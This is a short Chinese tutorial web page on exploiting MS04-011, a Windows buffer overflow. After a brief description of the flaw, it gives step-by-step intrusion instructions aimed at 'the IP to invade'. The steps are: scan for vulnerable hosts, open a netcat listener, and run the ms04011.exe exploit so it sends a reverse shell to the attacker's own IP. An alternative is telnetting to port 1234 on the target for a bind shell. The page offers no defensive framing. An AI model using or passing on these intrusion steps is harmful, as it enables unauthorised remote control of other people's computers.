经典漏洞ms04011的必杀技_漏洞研究教程-查字典教程网
经典漏洞ms04011的必杀技
经典漏洞ms04011的必杀技
发布时间:2016-12-26 来源:查字典编辑
摘要:受影响系统:MicrosoftWindowsXPMicrosoftWindowsNT4.0MicrosoftWindows2000描述:Mi...

受影响系统:

MicrosoftWindowsXP

MicrosoftWindowsNT4.0

MicrosoftWindows2000

描述:

MicrosoftWindowsWinlogon存在进程一个缓冲区溢出,远程攻击者可以利用这个漏洞可能以进程权限执行任意指令。

由于Winlogon在登录过程中使用的数据值大小没有进行任何检查就插入到分配的缓冲区中,可导致发生缓冲区溢出,精心构建提交数据可能以进程权限在系统上执行任意指令。

1用ms04011漏洞扫描器扫出有漏洞的主机扫到有VULNERABLE字样的说明主机有漏洞的可能性非常大

2扫到后用NC来监听nc-l-p监听端口-----按回车或nc-vv-l-p监听端口

3方式ms04011.exe0要入侵的IP监听端口自己IP

其中0表示2000系统NT5.01表示XP系统NT5.1

或者----------------------------------------------

先ms04011.exe0要入侵的IP

然后直接telnet要入侵的IP1234。

相关阅读
推荐文章
猜你喜欢
附近的人在看
推荐阅读
拓展阅读
  • 大家都在看
  • 小编推荐
  • 猜你喜欢
  • 最新漏洞研究学习
    热门漏洞研究学习
    实用技巧子分类